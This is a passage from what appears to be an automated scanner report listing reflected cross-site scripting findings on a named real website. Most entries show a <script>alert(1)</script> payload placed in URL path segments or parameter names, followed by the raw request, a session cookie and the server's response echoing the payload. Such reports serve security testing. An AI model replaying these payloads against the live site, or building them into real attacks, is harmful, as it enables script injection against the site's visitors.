Path:   /resources-information/ebooks/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23b74<script>alert(1)</script>100e5eee6be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information23b74<script>alert(1)</script>100e5eee6be/ebooks/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information23b74<script>alert(1)</script>100e5eee6be/ebooks/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.4025. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b97ac<script>alert(1)</script>5aed20c613e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooksb97ac<script>alert(1)</script>5aed20c613e/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooksb97ac<script>alert(1)</script>5aed20c613e/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.4026. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6aa43<script>alert(1)</script>78be1019b22 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes6aa43<script>alert(1)</script>78be1019b22/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes6aa43<script>alert(1)</script>78be1019b22/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.4027. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4d6bd<script>alert(1)</script>5de06f17c1a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos4d6bd<script>alert(1)</script>5de06f17c1a/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos4d6bd<script>alert(1)</script>5de06f17c1a/images/review/ was not found on this server.</p>
...[SNIP]...

2.4028. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 33d0f<script>alert(1)</script>775de27bebc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images33d0f<script>alert(1)</script>775de27bebc/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images33d0f<script>alert(1)</script>775de27bebc/review/ was not found on this server.</p>
...[SNIP]...

2.4029. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8e544<script>alert(1)</script>158719c9c89 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/review8e544<script>alert(1)</script>158719c9c89/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/review8e544<script>alert(1)</script>158719c9c89/ was not found on this server.</p>
...[SNIP]...

2.4030. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c5d4a<script>alert(1)</script>6322bbe0db8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/review/?c5d4a<script>alert(1)</script>6322bbe0db8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/review/?c5d4a<script>alert(1)</script>6322bbe0db8=1 was not found on this server.</p>
...[SNIP]...

2.4031. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b6178<script>alert(1)</script>370f24fc406 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-informationb6178<script>alert(1)</script>370f24fc406/ebooks/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-informationb6178<script>alert(1)</script>370f24fc406/ebooks/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.4032. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9d65d<script>alert(1)</script>73c90242793 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks9d65d<script>alert(1)</script>73c90242793/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks9d65d<script>alert(1)</script>73c90242793/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.4033. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ff7dc<script>alert(1)</script>e4f9e493fde was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themesff7dc<script>alert(1)</script>e4f9e493fde/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themesff7dc<script>alert(1)</script>e4f9e493fde/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.4034. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4a7ae<script>alert(1)</script>4837ed48d66 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos4a7ae<script>alert(1)</script>4837ed48d66/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos4a7ae<script>alert(1)</script>4837ed48d66/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.4035. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4329a<script>alert(1)</script>634363f5a54 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images4329a<script>alert(1)</script>634363f5a54/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images4329a<script>alert(1)</script>634363f5a54/review/0.gif was not found on this server.</p>
...[SNIP]...

2.4036. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 21236<script>alert(1)</script>137a85fad0a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/review21236<script>alert(1)</script>137a85fad0a/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:54:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/review21236<script>alert(1)</script>137a85fad0a/0.gif was not found on this server.</p>
...[SNIP]...

2.4037. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload dbf6c<script>alert(1)</script>34986f3169 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/review/0.gifdbf6c<script>alert(1)</script>34986f3169 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:54:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/review/0.gifdbf6c<script>alert(1)</script>34986f3169 was not found on this server.</p>
...[SNIP]...

2.4038. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a7c2a<script>alert(1)</script>541b77bad72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/review/0.gif?a7c2a<script>alert(1)</script>541b77bad72=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:52:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/review/0.gif?a7c2a<script>alert(1)</script>541b77bad72=1 was not found on this server.</p>
...[SNIP]...

2.4039. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7ea3f<script>alert(1)</script>687925da9b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information7ea3f<script>alert(1)</script>687925da9b9/ebooks/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information7ea3f<script>alert(1)</script>687925da9b9/ebooks/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4040. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7c530<script>alert(1)</script>46bb86e2c30 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks7c530<script>alert(1)</script>46bb86e2c30/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks7c530<script>alert(1)</script>46bb86e2c30/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4041. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 499a4<script>alert(1)</script>5a1179c9690 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes499a4<script>alert(1)</script>5a1179c9690/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes499a4<script>alert(1)</script>5a1179c9690/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4042. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2c5c5<script>alert(1)</script>268b550fcb8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos2c5c5<script>alert(1)</script>268b550fcb8/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
